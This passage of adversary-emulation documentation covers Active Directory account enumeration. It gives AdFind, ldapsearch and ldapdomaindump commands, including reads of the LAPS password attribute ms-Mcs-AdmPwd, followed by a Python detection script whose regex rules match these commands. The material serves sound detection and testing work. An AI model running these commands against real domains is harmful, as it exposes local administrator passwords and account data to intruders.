This test executes an LDAP query using the AdFind command and lists all the attributes, including the Microsoft LAPS attributes ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime.
**Supported Platforms:** Windows
**auto_generated_guid:** `abf00f6c-9983-4d9a-afbc-6b1c6c6448e1`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
| domain | Domain of the host | string | $env:USERDOMAIN|
#### Attack Commands: Run with `powershell`!
```powershell
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
```
### Atomic Test #22: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd
This test executes an LDAP query using the AdFind command and lists the Microsoft LAPS attributes ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime.
**Supported Platforms:** Windows
**auto_generated_guid:** `51a98f96-0269-4e09-a10f-e307779a8b05`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
| domain | Domain of the host | string | $env:USERDOMAIN|
#### Attack Commands: Run with `powershell`!
```powershell
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
```
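The commands in Tests #1, #2, #5 to #9, #11, #12, #16 and #18 to #22 all leave a recognisable process command line behind, which is the cheapest place to detect them. The block below is an added example, not part of Atomic Red Team: detection logic a SOC could run over process-creation telemetry (Sysmon Event ID 1 or Security 4688 command lines), with one rule per family of commands on this page and two benign control events that must not fire. Rule names, field names and the sample events are constructed for this example; the AdFind rule keys on arguments rather than the image name because the binary is frequently renamed.

```python
# Added example (not part of Atomic Red Team): flag the domain-account enumeration command
# lines exercised by the tests above in process-creation telemetry. Rule names and sample
# events are constructed for this example.
import re

ENUM_RULES = [
    # net.exe hands most subcommands to net1.exe, so match both image names.
    ("net_domain_enum", r"\bnet1?(\.exe)?\s+(user|group)\b.*?/domain\b"),
    # AdFind is often renamed: key on its arguments, not the image name.
    ("adfind_recon", r"-sc\s+(admincountdmp|exchaddresses)\b|\(objectcategory=person\)|\blockoutthreshold\b"),
    # Bulk attribute reads on computer objects expose the LAPS password attributes.
    ("laps_attribute_read", r"ms-mcs-admpwd|get-adcomputer.*-properties\s+\*|objectclass=computer\"?\s+\*"),
    ("powershell_ad_enum", r"get-aduser\s+-filter\s+\*|get-domainuser\b|\[adsisearcher\]"),
    ("kerbrute_userenum", r"\bkerbrute(\.exe)?\s+userenum\b"),
]
COMPILED_RULES = [(name, re.compile(pattern, re.IGNORECASE)) for name, pattern in ENUM_RULES]


def match_rules(command_line):
    """Names of every rule whose pattern appears in the command line."""
    return [name for name, rx in COMPILED_RULES if rx.search(command_line)]


def detect_enumeration(events):
    """One finding per (event, rule) pair, keeping user and image for triage."""
    findings = []
    for ev in events:
        for rule in match_rules(ev["command_line"]):
            findings.append({"rule": rule, "user": ev["user"], "image": ev["image"],
                             "command_line": ev["command_line"]})
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events; the last two before the Get-ADUser line are benign controls.
SAMPLE_EVENTS = [
    {"user": "EXAMPLE\\jdoe", "image": r"C:\Windows\System32\net.exe", "command_line": "net  user /domain"},
    {"user": "EXAMPLE\\jdoe", "image": r"C:\Windows\System32\net1.exe", "command_line": 'net1 group "Domain Admins" /domain'},
    {"user": "EXAMPLE\\jdoe", "image": r"C:\Users\Public\svc.exe", "command_line": '"C:\\Users\\Public\\svc.exe" -sc admincountdmp'},
    {"user": "EXAMPLE\\jdoe", "image": PS,
     "command_line": 'powershell.exe -c "Get-ADComputer WEB01$ -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime"'},
    {"user": "EXAMPLE\\jdoe", "image": PS,
     "command_line": "powershell.exe -c \"Get-adcomputer -SearchScope subtree -filter 'name -like *' -Properties *\""},
    {"user": "EXAMPLE\\jdoe", "image": r"C:\Users\Public\kerbrute.exe",
     "command_line": "kerbrute.exe userenum -d EXAMPLE --dc dc01.example.test users.txt"},
    {"user": "EXAMPLE\\jdoe", "image": r"C:\Windows\System32\net.exe", "command_line": r"net use Z: \\fs01\share"},
    {"user": "EXAMPLE\\admin", "image": PS, "command_line": 'powershell.exe -c "Get-ADComputer WS02 -Properties OperatingSystem"'},
    {"user": "EXAMPLE\\jdoe", "image": PS, "command_line": 'powershell.exe -c "Get-ADUser -Filter *"'},
]

if __name__ == "__main__":
    for finding in detect_enumeration(SAMPLE_EVENTS):
        print(f'{finding["rule"]:22} {finding["user"]:16} {finding["command_line"]}')
```

Command-line matching only sees what is typed on the host; a client that speaks LDAP directly (ldapsearch, ldapdomaindump, or a PowerShell script that builds the query in memory) produces no such line. Pair these rules with directory-side telemetry, in particular Event ID 4662 with object access auditing on the LAPS attributes, so that reads of ms-Mcs-AdmPwd are recorded regardless of the tool used.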
### Atomic Test #23: Active Directory Domain Search
Outputs information from ldapsearch. The LDAP password is the admin user's password in Active Directory.
**Supported Platforms:** Linux
**auto_generated_guid:** `096b6d2a-b63f-4100-8fa0-525da4cd25ca`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | The domain to be tested | string | example|
| top_level_domain | The top level domain (.com, .test, .remote, etc... following domain, minus the .) | string | test|
| user | username@domain of a user within the ad database | string | user@example.test|
| password | password of the user with admin privileges referenced in admin_user | string | s3CurePssw0rD!|
#### Attack Commands: Run with `sh`!
```sh
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
```
#### Dependencies: Run with `sh`!
##### Description: Packages sssd-ad, sssd-tools, realmd and adcli installed, realm available, and ldapsearch present
###### Check Prereq Commands
```sh
which ldapsearch
```
###### Get Prereq Commands
```sh
echo ldapsearch not found
```
### Atomic Test #24: Account Enumeration with LDAPDomainDump
This test uses LDAPDomainDump to perform account enumeration on a domain.
[Reference](https://securityonline.info/ldapdomaindump-active-directory-information-dumper-via-ldap/)
**Supported Platforms:** Linux
**auto_generated_guid:** `a54d497e-8dbe-4558-9895-44944baa395f`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username and domain to authenticate with | string | domain\user|
| target_ip | IP to connect to | string | 127.0.0.1|
| password | Password to authenticate with | string | password|
#### Attack Commands: Run with `sh`!
```sh
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
```
#### Cleanup Commands
```sh
rm -rf /tmp/T1087/ 2>/dev/null
```
#### Dependencies: Run with `sh`!
##### Description: Python3 must be installed
###### Check Prereq Commands
```sh
if [ -x "$(command -v python3 --version)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
```sh
sudo apt-get -y install python3
```
##### Description: Pip must be installed
###### Check Prereq Commands
```sh
if [ -x "$(command -v pip --version)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
```sh
wget -O /tmp/get-pip.py https://bootstrap.pypa.io/pip/3.6/get-pip.py
python3 /tmp/get-pip.py
```
##### Description: The ldapdomaindump module must be installed
###### Check Prereq Commands
```sh
python3 -c 'import ldapdomaindump' 2>/dev/null
```
###### Get Prereq Commands
```sh
pip install ldapdomaindump
```
##### Description: The future module must be installed
###### Check Prereq Commands
```sh
python3 -c 'import future' 2>/dev/null
```
###### Get Prereq Commands
```sh
pip install future
```